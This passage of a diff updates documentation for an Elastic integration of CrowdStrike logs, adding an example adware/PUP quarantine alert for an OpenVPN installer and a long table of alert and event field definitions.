\\\"qhT7k?[D\\\"Bk:5s%+=\\u003e#DM0j$_\\u003cr/JG0TCEQ!Ug(be3)\\u0026R2JnX+RSqorgC-NCjf6XATBWX(5\\u003cL1J1DV\\u003e44ZjO9q*d!YLuHhkq!3\\u003e3tpi\\u003eOPYZp9]5f1#/AlRZL06`/I6cl\\\"d.\\u0026=To@9kS!prs8N\"]},\"crawl_vertex_ids\":{\"Sensor\":[\"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4\",\"mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33\",\"pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135\",\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876\",\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993\",\"quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753
d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\"]},\"crawled_timestamp\":\"2023-11-03T19:00:23.985020992Z\",\"created_timestamp\":\"2023-11-03T18:01:23.995794943Z\",\"data_domains\":[\"Endpoint\"],\"description\":\"ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.\",\"device\":{\"agent_load_flags\":\"0\",\"agent_local_time\":\"2023-10-12T03:45:57.753Z\",\"agent_version\":\"7.04.17605.0\",\"bios_manufacturer\":\"ABC\",\"bios_version\":\"F8CN42WW(V2.05)\",\"cid\":\"92012896127c4a948236ba7601b886b0\",\"config_id_base\":\"65994763\",\"config_id_build\":\"17605\",\"config_id_platform\":\"3\",\"device_id\":\"2ce412d17b334ad4adc8c1c54dbfec4b\",\"external_ip\":\"81.2.69.142\",\"first_seen\":\"2023-04-07T09:36:36Z\",\"groups\":[\"18704e21288243b58e4c76266d38caaf\"],\"hostinfo\":{\"active_directory_dn_display\":[\"WinComputers\",\"WinComputers\\\\ABC\"],\"domain\":\"ABC.LOCAL\"},\"hostname\":\"ABC709-1175\",\"last_seen\":\"2023-11-03T17:51:42Z\",\"local_ip\":\"81.2.69.142\",\"mac_address\":\"ab-21-48-61-05-b2\",\"machine_domain\":\"ABC.LOCAL\",\"major_version\":\"10\",\"minor_version\":\"0\",\"modified_timestamp\":\"2023-11-03T17:53:43Z\",\"os_version\":\"Windows11\",\"ou\":[\"ABC\",\"WinComputers\"],\"platform_id\":\"0\",\"platform_name\":\"Windows\",\"pod_labels\":null,\"product_type\":\"1\",\"product_type_desc\":\"Workstation\",\"site_name\":\"Default-First-Site-Name\",\"status\":\"normal\",\"system_manufacturer\":\"LENOVO\",\"system_product_name\":\"20VE\"},\"falcon_host_link\":\"https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"filename\":\"openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenV
PNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"grandparent_details\":{\"cmdline\":\"C:\\\\Windows\\\\system32\\\\userinit.exe\",\"filename\":\"userinit.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\userinit.exe\",\"local_process_id\":\"4328\",\"md5\":\"b07f77fd3f9828b2c9d61f8a36609741\",\"process_graph_id\":\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135\",\"process_id\":\"392734873135\",\"sha256\":\"caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33\",\"timestamp\":\"2023-10-30T16:49:19Z\",\"user_graph_id\":\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"yuvraj.mahajan\"},\"has_script_or_module_ioc\":\"true\",\"id\":\"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"indicator_id\":\"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"ioc_context\":[{\"ioc_description\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"ioc_source\":\"library_load\",\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"md5\":\"cdf9cfebb400ce89d5b6032bfcdc693b\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"type\":\"module\"}],\"ioc_values\":[],\"is_synthetic_quarantine_disposition\":true,\"local_process_id\":\"17076\",\"logon_domain\":\"ABSYS\",\"md5\":\"cdf9cfebb400ce89d5b6032bfcdc693b\",\"name\":\"PrewittPupAdwareSensorDetect-Lowest\",\"objective\":\"FalconDetectionMethod\",\"parent_details\":{\"cmdline\":\"C:\\\\WINDOWS\\\\Explorer.EX
E\",\"filename\":\"explorer.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\explorer.exe\",\"local_process_id\":\"1040\",\"md5\":\"8cc3fcdd7d52d2d5221303c213e044ae\",\"process_graph_id\":\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876\",\"process_id\":\"392736520876\",\"sha256\":\"0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4\",\"timestamp\":\"2023-11-03T18:00:32Z\",\"user_graph_id\":\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"mohit.jha\"},\"parent_process_id\":\"392736520876\",\"pattern_disposition\":2176,\"pattern_disposition_description\":\"Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.\",\"pattern_disposition_details\":{\"blocking_unsupported_or_disabled\":false,\"bootup_safeguard_enabled\":false,\"critical_process_disabled\":false,\"detect\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"inddet_mask\":false,\"indicator\":false,\"kill_action_failed\":false,\"kill_parent\":false,\"kill_process\":false,\"kill_subprocess\":false,\"operation_blocked\":false,\"policy_disabled\":false,\"process_blocked\":true,\"quarantine_file\":true,\"quarantine_machine\":false,\"registry_operation_blocked\":false,\"rooting\":false,\"sensor_only\":false,\"suspend_parent\":false,\"suspend_process\":false},\"pattern_id\":5761,\"platform\":\"Windows\",\"poly_id\":\"AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==\",\"process_end_time\":\"1699034421\",\"process_id\":\"399748687993\",\"process_start_time\":\"1699034413\",\"product\":\"epp\",\"quarantined_files\":[{\"filename\":\"\\\\Device\\\\Volume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-
pfsense-install-2.6.5-I001-amd64.exe\",\"id\":\"2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"state\":\"quarantined\"}],\"scenario\":\"NGAV\",\"severity\":30,\"sha1\":\"0000000000000000000000000000000000000000\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"show_in_ui\":true,\"source_products\":[\"FalconInsight\"],\"source_vendors\":[\"CrowdStrike\"],\"status\":\"new\",\"tactic\":\"MachineLearning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Adware/PUP\",\"technique_id\":\"CST0000\",\"timestamp\":\"2023-11-03T18:00:22.328Z\",\"tree_id\":\"1931778\",\"tree_root\":\"38687993\",\"triggering_process_graph_id\":\"pid:2ce4124ad4adc8c1c54dbfec4b:399748687993\",\"type\":\"ldt\",\"updated_timestamp\":\"2023-11-03T19:00:23.985007341Z\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"mohit.jha\"}", + "severity": 30 + }, + "file": { + "name": "openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "path": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe" + }, + "host": { + "domain": "ABC.LOCAL", + "hostname": "ABC709-1175", + "ip": [ + "81.2.69.142" + ], + "mac": [ + "AB-21-48-61-05-B2" + ], + "os": { + "full": "Windows11", + "platform": "Windows" + } + }, + "input": { + "type": "cel" + }, + "message": "ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "process": { + "end": "2023-11-03T18:00:21.000Z", + "parent": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "hash": { + "md5": "8cc3fcdd7d52d2d5221303c213e044ae", + "sha256": "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4" + }, + 
"pid": 392736520876 + }, + "pid": 399748687993, + "start": "2023-11-03T18:00:13.000Z", + "user": { + "id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "name": "mohit.jha" + } + }, + "related": { + "hash": [ + "ABC709-1175", + "b07f77fd3f9828b2c9d61f8a36609741", + "cdf9cfebb400ce89d5b6032bfcdc693b", + "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "8cc3fcdd7d52d2d5221303c213e044ae", + "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "0000000000000000000000000000000000000000" + ], + "hosts": [ + "ABC.LOCAL" + ], + "ip": [ + "81.2.69.142" + ], + "user": [ + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "S-1-5-21-1909377054-3469629671-4104191496-4425", + "yuvraj.mahajan", + "mohit.jha" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields", + "forwarded", + "crowdstrike-alert" + ], + "threat": { + "tactic": { + "id": [ + "TA0004" + ], + "name": [ + "MachineLearning" + ] + }, + "technique": { + "id": [ + "T0000" + ], + "name": [ + "Adware/PUP" + ] + } + }, + "user": { + "id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "name": "mohit.jha" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| crowdstrike.alert.agent_id | Unique identifier for the CrowdStrike agent. | keyword | +| crowdstrike.alert.aggregate_id | An aggregate identifier associated with the agent. | keyword | +| crowdstrike.alert.alleged_filetype | The alleged file type of the detected file. | keyword | +| crowdstrike.alert.cid | CrowdStrike identifier associated with the device. | keyword | +| crowdstrike.alert.cloud_indicator | Indicates whether the activity is related to the cloud. | boolean | +| crowdstrike.alert.cmdline | The command line used to execute the file. | keyword | +| crowdstrike.alert.composite_id | A composite identifier associated with the device. 
| keyword |
+| crowdstrike.alert.confidence | Confidence level associated with the detection. | long |
+| crowdstrike.alert.context_timestamp | Timestamp when the alert was generated. | date |
+| crowdstrike.alert.control_graph_id | Identifier associated with the control graph. | keyword |
+| crowdstrike.alert.crawl_edge_ids.Sensor | Edge identifiers associated with crawling. | keyword |
+| crowdstrike.alert.crawl_vertex_ids.Sensor | Vertex identifiers associated with crawling. | keyword |
+| crowdstrike.alert.crawled_timestamp | Timestamp indicating when crawling occurred. | date |
+| crowdstrike.alert.created_timestamp | Timestamp indicating when the alert was created. | date |
+| crowdstrike.alert.data_domains | Data domains associated with the alert. | keyword |
+| crowdstrike.alert.description | Description of the detected file or activity. | keyword |
+| crowdstrike.alert.device.agent_load_flags | Flags indicating the load status of the agent. | long |
+| crowdstrike.alert.device.agent_local_time | Local time of the agent. | date |
+| crowdstrike.alert.device.agent_version | Version of the CrowdStrike agent. | keyword |
+| crowdstrike.alert.device.bios_manufacturer | Manufacturer of the BIOS. | keyword |
+| crowdstrike.alert.device.bios_version | Version of the BIOS. | keyword |
+| crowdstrike.alert.device.cid | CrowdStrike identifier associated with the device. | keyword |
+| crowdstrike.alert.device.config_id_base | Base configuration identifier. | keyword |
+| crowdstrike.alert.device.config_id_build | Build configuration identifier. | keyword |
+| crowdstrike.alert.device.config_id_platform | Platform configuration identifier. | long |
+| crowdstrike.alert.device.external_ip | External IP address of the device. | ip |
+| crowdstrike.alert.device.first_seen | Timestamp indicating when the device was first seen. | date |
+| crowdstrike.alert.device.groups | Groups associated with the device. 
| keyword |
+| crowdstrike.alert.device.hostinfo.active_directory_dn_display | Display name for Active Directory. | keyword |
+| crowdstrike.alert.device.hostinfo.domain | Domain of the device. | keyword |
+| crowdstrike.alert.device.hostname | Hostname of the device. | keyword |
+| crowdstrike.alert.device.id | Unique identifier for the device. | keyword |
+| crowdstrike.alert.device.last_seen | Timestamp indicating when the device was last seen. | date |
+| crowdstrike.alert.device.local_ip | Local IP address of the device. | ip |
+| crowdstrike.alert.device.mac_address | MAC address of the device. | keyword |
+| crowdstrike.alert.device.machine_domain | Domain of the machine. | keyword |
+| crowdstrike.alert.device.major_version | Major version of the device. | keyword |
+| crowdstrike.alert.device.minor_version | Minor version of the device. | keyword |
+| crowdstrike.alert.device.modified_timestamp | Timestamp indicating when the device was last modified. | date |
+| crowdstrike.alert.device.os_version | Operating system version. | keyword |
+| crowdstrike.alert.device.ou | Organizational unit information. | keyword |
+| crowdstrike.alert.device.platform_id | Platform identifier. | keyword |
+| crowdstrike.alert.device.platform_name | Name of the platform. | keyword |
+| crowdstrike.alert.device.pod_labels | Labels associated with the device. | keyword |
+| crowdstrike.alert.device.product_type | Type of product associated with the device. | keyword |
+| crowdstrike.alert.device.product_type_desc | Description of the product type. | keyword |
+| crowdstrike.alert.device.site_name | Name of the site associated with the device. | keyword |
+| crowdstrike.alert.device.status | Status of the device. | keyword |
+| crowdstrike.alert.device.system_manufacturer | System manufacturer of the device. | keyword |
+| crowdstrike.alert.device.system_product_name | System product name. 
| keyword |
+| crowdstrike.alert.falcon_host_link | Link to CrowdStrike Falcon host activity. | keyword |
+| crowdstrike.alert.filename | Name of the detected file. | keyword |
+| crowdstrike.alert.filepath | Path to the detected file. | keyword |
+| crowdstrike.alert.grandparent_details.cmdline | Command line of the grandparent process. | keyword |
+| crowdstrike.alert.grandparent_details.filename | Filename of the grandparent process. | keyword |
+| crowdstrike.alert.grandparent_details.filepath | Filepath of the grandparent process. | keyword |
+| crowdstrike.alert.grandparent_details.local_process_id | Local process ID of the grandparent process. | keyword |
+| crowdstrike.alert.grandparent_details.md5 | grandparent_details.md5 MD5 hash of the grandparent process. | keyword |
+| crowdstrike.alert.grandparent_details.process_graph_id | Graph ID of the grandparent process. | keyword |
+| crowdstrike.alert.grandparent_details.process_id | Process ID of the grandparent process. | keyword |
+| crowdstrike.alert.grandparent_details.sha256 | grandparent_details.sha256 SHA256 hash of the grandparent process. | keyword |
+| crowdstrike.alert.grandparent_details.timestamp | Timestamp of the grandparent process. | date |
+| crowdstrike.alert.grandparent_details.user_graph_id | Graph ID of the grandparent process user. | keyword |
+| crowdstrike.alert.grandparent_details.user_id | User ID of the grandparent process. | keyword |
+| crowdstrike.alert.grandparent_details.user_name | Username of the grandparent process. | keyword |
+| crowdstrike.alert.has_script_or_module_ioc | Indicates if there is a script or module IOC (Indicator of Compromise). | boolean |
+| crowdstrike.alert.id | Identifier associated with the alert. | keyword |
+| crowdstrike.alert.indicator_id | Identifier of the detected indicator. | keyword |
+| crowdstrike.alert.ioc_context.cmdline | Command Line of the IOC context. 
| keyword | +| crowdstrike.alert.ioc_context.ioc_description | Description of the IOC context. | keyword | +| crowdstrike.alert.ioc_context.ioc_source | Source of the IOC. | keyword | +| crowdstrike.alert.ioc_context.ioc_type | Type of IOC. | keyword | +| crowdstrike.alert.ioc_context.ioc_value | Value of the IOC. | keyword | +| crowdstrike.alert.ioc_context.md5 | ioc_context.md5 MD5 hash associated with the IOC. | keyword | +| crowdstrike.alert.ioc_context.sha256 | ioc_context.sha256 SHA256 hash associated with the IOC. | keyword | +| crowdstrike.alert.ioc_context.type | Type of IOC context. | keyword | +| crowdstrike.alert.ioc_values | Values associated with the IOC. | keyword | +| crowdstrike.alert.is_synthetic_quarantine_disposition | Indicates if the quarantine disposition is synthetic. | boolean | +| crowdstrike.alert.local_process_id | Local process ID associated with the alert. | keyword | +| crowdstrike.alert.logon_domain | Domain associated with the logon. | keyword | +| crowdstrike.alert.md5 | md5 MD5 hash associated with the detected file. | keyword | +| crowdstrike.alert.name | Name of the detection. | keyword | +| crowdstrike.alert.objective | Objective of the detection. | keyword | +| crowdstrike.alert.parent_details.cmdline | Command line of the parent process. | keyword | +| crowdstrike.alert.parent_details.filename | Filename of the parent process. | keyword | +| crowdstrike.alert.parent_details.filepath | Filepath of the parent process. | keyword | +| crowdstrike.alert.parent_details.local_process_id | Local process ID of the parent process. | keyword | +| crowdstrike.alert.parent_details.md5 | parent_details.md5 MD5 hash of the parent process. | keyword | +| crowdstrike.alert.parent_details.process_graph_id | Graph ID of the parent process. | keyword | +| crowdstrike.alert.parent_details.process_id | Process ID of the parent process. | keyword | +| crowdstrike.alert.parent_details.sha256 | parent_details.sha256 SHA256 hash of the parent process. 
| keyword | +| crowdstrike.alert.parent_details.timestamp | Timestamp of the parent process. | date | +| crowdstrike.alert.parent_details.user_graph_id | Graph ID of the parent process user. | keyword | +| crowdstrike.alert.parent_details.user_id | User ID of the parent process. | keyword | +| crowdstrike.alert.parent_details.user_name | Username of the parent process. | keyword | +| crowdstrike.alert.parent_process_id | Process ID of the parent process. | keyword | +| crowdstrike.alert.pattern_disposition | Disposition of the pattern. | long | +| crowdstrike.alert.pattern_disposition_description | Description of the pattern disposition. | keyword | +| crowdstrike.alert.pattern_disposition_details.blocking_unsupported_or_disabled | Indicates if blocking is unsupported or disabled. | boolean | +| crowdstrike.alert.pattern_disposition_details.bootup_safeguard_enabled | Indicates if the bootup safeguard is enabled. | boolean | +| crowdstrike.alert.pattern_disposition_details.critical_process_disabled | Indicates if the critical process is disabled. | boolean | +| crowdstrike.alert.pattern_disposition_details.detect | Indicates if the pattern detected the threat. | boolean | +| crowdstrike.alert.pattern_disposition_details.fs_operation_blocked | Indicates if file system operation is blocked. | boolean | +| crowdstrike.alert.pattern_disposition_details.handle_operation_downgraded | Indicates if handle operation is downgraded. | boolean | +| crowdstrike.alert.pattern_disposition_details.inddet_mask | Indicates if the indicator detection mask is true. | boolean | +| crowdstrike.alert.pattern_disposition_details.indicator | Indicates if the pattern detected an indicator. | boolean | +| crowdstrike.alert.pattern_disposition_details.kill_action_failed | Indicates if the kill action failed. | boolean | +| crowdstrike.alert.pattern_disposition_details.kill_parent | Indicates if the parent process was killed. 
| boolean | +| crowdstrike.alert.pattern_disposition_details.kill_process | Indicates if the process was killed. | boolean | +| crowdstrike.alert.pattern_disposition_details.kill_subprocess | Indicates if the subprocess was killed. | boolean | +| crowdstrike.alert.pattern_disposition_details.operation_blocked | Indicates if the operation is blocked. | boolean | +| crowdstrike.alert.pattern_disposition_details.policy_disabled | Indicates if the policy is disabled. | boolean | +| crowdstrike.alert.pattern_disposition_details.process_blocked | Indicates if the process is blocked. | boolean | +| crowdstrike.alert.pattern_disposition_details.quarantine_file | Indicates if the file is quarantined. | boolean | +| crowdstrike.alert.pattern_disposition_details.quarantine_machine | Indicates if the machine is quarantined. | boolean | +| crowdstrike.alert.pattern_disposition_details.registry_operation_blocked | Indicates if registry operation is blocked. | boolean | +| crowdstrike.alert.pattern_disposition_details.rooting | Indicates if rooting is detected. | boolean | +| crowdstrike.alert.pattern_disposition_details.sensor_only | Indicates if the detection is based on the sensor only. | boolean | +| crowdstrike.alert.pattern_disposition_details.suspend_parent | Indicates if the parent process was suspended. | boolean | +| crowdstrike.alert.pattern_disposition_details.suspend_process | Indicates if the process was suspended. | boolean | +| crowdstrike.alert.pattern_id | Identifier associated with the pattern. | keyword | +| crowdstrike.alert.platform | Platform associated with the alert. | keyword | +| crowdstrike.alert.poly_id | Identifier associated with polymorphic behavior. | keyword | +| crowdstrike.alert.process_end_time | Timestamp indicating when the process ended. | date | +| crowdstrike.alert.process_id | Identifier associated with the process. | keyword | +| crowdstrike.alert.process_start_time | Timestamp indicating when the process started. 
| date | +| crowdstrike.alert.product | Product associated with the detection. | keyword | +| crowdstrike.alert.quarantined_files.filename | Filename of quarantined files. | keyword | +| crowdstrike.alert.quarantined_files.id | Identifier of quarantined files. | keyword | +| crowdstrike.alert.quarantined_files.sha256 | quarantined_files.sha256 SHA256 hash of quarantined files. | keyword | +| crowdstrike.alert.quarantined_files.state | State of quarantined files. | keyword | +| crowdstrike.alert.scenario | Scenario associated with the detection. | keyword | +| crowdstrike.alert.severity | Severity level associated with the detection. | long | +| crowdstrike.alert.sha1 | sha1 SHA1 hash associated with the detected file. | keyword | +| crowdstrike.alert.sha256 | sha256 SHA256 hash associated with the detected file. | keyword | +| crowdstrike.alert.show_in_ui | Indicates if the alert should be displayed in the user interface. | boolean | +| crowdstrike.alert.source_products | Products associated with the data source. | keyword | +| crowdstrike.alert.source_vendors | Vendors associated with the data source. | keyword | +| crowdstrike.alert.status | Status of the alert. | keyword | +| crowdstrike.alert.tactic | Tactic associated with the detection. | keyword | +| crowdstrike.alert.tactic_id | Identifier associated with the tactic. | keyword | +| crowdstrike.alert.technique | Technique associated with the detection. | keyword | +| crowdstrike.alert.technique_id | Identifier associated with the technique. | keyword | +| crowdstrike.alert.timestamp | Timestamp associated with the alert. | date | +| crowdstrike.alert.tree_id | Identifier associated with the tree. | keyword | +| crowdstrike.alert.tree_root | Root identifier associated with the tree. | keyword | +| crowdstrike.alert.triggering_process_graph_id | Graph ID of the triggering process. | keyword | +| crowdstrike.alert.type | Type associated with the alert. 
| keyword | +| crowdstrike.alert.updated_timestamp | Timestamp indicating when the alert was last updated. | date | +| crowdstrike.alert.user_id | User ID associated with the alert. | keyword | +| crowdstrike.alert.user_name | Username associated with the alert. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| event.dataset | Event dataset. | constant_keyword | +| event.module | Event module. | constant_keyword | +| input.type | Type of filebeat input. | keyword | +| log.offset | Log offset. | long | +| tags | User defined tags. | keyword | + + ### Falcon Contains endpoint data and CrowdStrike Falcon platform audit data forwarded from Falcon SIEM Connector. @@ -37,6 +577,7 @@ Current supported event types are: - Mobile Detection events - Recon Notification events - XDR Detection events +- Scheduled Report Notification events **Exported fields** @@ -61,6 +602,7 @@ Current supported event types are: | container.labels | Image labels. | object | | container.name | Container name. | keyword | | crowdstrike.event.AccountCreationTimeStamp | The timestamp of when the source account was created in Active Directory. | date | +| crowdstrike.event.AccountId | | keyword | | crowdstrike.event.ActivityId | ID of the activity that triggered the detection. | keyword | | crowdstrike.event.AddedPrivilege | The difference between their current and previous list of privileges. | keyword | | crowdstrike.event.AdditionalAccountObjectGuid | Additional involved user object GUID. | keyword | 
@@ -72,6 +614,7 @@ Current supported event types are:
 | crowdstrike.event.AdditionalEndpointSensorId | Additional involved endpoint agent ID. | keyword |
 | crowdstrike.event.AdditionalLocationCountryCode | Additional involved country code. | keyword |
 | crowdstrike.event.AdditionalSsoApplicationIdentifier | Additional application identifier. | keyword |
+| crowdstrike.event.AgentIdString | | keyword |
 | crowdstrike.event.AnomalousTicketContentClassification | Ticket signature analysis. | keyword |
 | crowdstrike.event.AssociatedFile | The file associated with the triggering indicator. | keyword |
 | crowdstrike.event.Attributes | JSON objects containing additional information about the event. | flattened |
@@ -80,6 +623,9 @@ Current supported event types are:
 | crowdstrike.event.CertificateTemplateIdentifier | The ID of the certificate template. | keyword |
 | crowdstrike.event.CertificateTemplateName | Name of the certificate template. | keyword |
 | crowdstrike.event.Certificates | Provides one or more JSON objects which includes related SSL/TLS Certificates. | nested |
+| crowdstrike.event.CloudPlatform | | keyword |
+| crowdstrike.event.CloudProvider | | keyword |
+| crowdstrike.event.CloudService | | keyword |
 | crowdstrike.event.Commands | Commands run in a remote session. | keyword |
 | crowdstrike.event.ComputerName | Name of the computer where the detection occurred. | keyword |
 | crowdstrike.event.CustomerId | Customer identifier. | keyword | 
@@ -93,6 +639,14 @@ Current supported event types are:
 | crowdstrike.event.EnvironmentVariables | Provides one or more JSON objects which includes related environment variables. | nested |
 | crowdstrike.event.EventType | CrowdStrike provided event type. | keyword |
 | crowdstrike.event.ExecutablesWritten | Detected executables written to disk by a process. | nested |
+| crowdstrike.event.ExecutionID | | keyword |
+| crowdstrike.event.ExecutionMetadata.ExecutionDuration | | long |
+| crowdstrike.event.ExecutionMetadata.ExecutionStart | | date |
+| crowdstrike.event.ExecutionMetadata.ReportFileName | | keyword |
+| crowdstrike.event.ExecutionMetadata.ResultCount | | long |
+| crowdstrike.event.ExecutionMetadata.ResultID | | keyword |
+| crowdstrike.event.ExecutionMetadata.SearchWindowEnd | | date |
+| crowdstrike.event.ExecutionMetadata.SearchWindowStart | | date |
 | crowdstrike.event.Finding | The details of the finding. | keyword |
 | crowdstrike.event.FineScore | The highest incident score reached as of the time the event was sent. | float |
 | crowdstrike.event.Flags.Audit | CrowdStrike audit flag. | boolean |
@@ -172,6 +726,11 @@ Current supported event types are:
 | crowdstrike.event.PreviousPrivileges | A list of the source account's privileges before privilege changes were made. | keyword |
 | crowdstrike.event.Protocol | CrowdStrike provided protocol. | keyword |
 | crowdstrike.event.ProtocolAnomalyClassification | Authentication signature analysis. | keyword |
+| crowdstrike.event.Region | | keyword |
+| crowdstrike.event.ReportFileReference | | keyword |
+| crowdstrike.event.ReportID | | keyword |
+| crowdstrike.event.ReportName | | keyword |
+| crowdstrike.event.ReportType | | keyword |
 | crowdstrike.event.ResourceAttributes | A JSON blob with all resource attributes. | flattened |
 | crowdstrike.event.ResourceId | The cloud resource identifier. | keyword |
 | crowdstrike.event.ResourceIdType | The type of the detected resource identifier. | keyword | 
@@ -209,6 +768,7 @@ Current supported event types are:
 | crowdstrike.event.SsoApplicationIdentifier | Destination application identifier. | keyword |
 | crowdstrike.event.State | Identity-based detection or incident status. | keyword |
 | crowdstrike.event.Status | CrowdStrike status. | keyword |
+| crowdstrike.event.StatusMessage | | keyword |
 | crowdstrike.event.Success | Indicator of whether or not this event was successful. | boolean |
 | crowdstrike.event.SuspiciousMachineAccountAlterationType | Machine alteration type. | keyword |
 | crowdstrike.event.SystemProperties | Provides one or more JSON objects which includes related system properties. | nested |
@@ -226,6 +786,7 @@ Current supported event types are:
 | crowdstrike.event.Trampolines | Provides one or more JSON objects describing the relevant functions and processes performing inline API hooks. | nested |
 | crowdstrike.event.TreeID | CrowdStrike tree id. | keyword |
 | crowdstrike.event.UserId | Email address or user ID associated with the event. | keyword |
+| crowdstrike.event.UserUUID | | keyword |
 | crowdstrike.event.VerifiedBootState | Provides the device’s current boot state. | keyword |
 | crowdstrike.event.XdrType | Type of detection: xdr or xdr-scheduled-search. | keyword |
 | crowdstrike.metadata.customerIDString | Customer identifier | keyword |
@@ -355,11 +916,11 @@ An example event for `falcon` looks as following:
 {
 "@timestamp": "2020-02-12T21:29:10.000Z",
 "agent": {
- "ephemeral_id": "6b7924ba-f695-422a-a296-d1092ff909e4",
- "id": "f25d13cd-18cc-4e73-822c-c4f849322623",
+ "ephemeral_id": "fe495f50-2dbf-43ee-9c49-b35ef8bf9235",
+ "id": "df7cb44a-7978-449c-992e-c6b22e788ae9",
 "name": "docker-fleet-agent",
 "type": "filebeat",
- "version": "8.10.1"
+ "version": "8.11.0"
 },
 "crowdstrike": {
 "event": { 
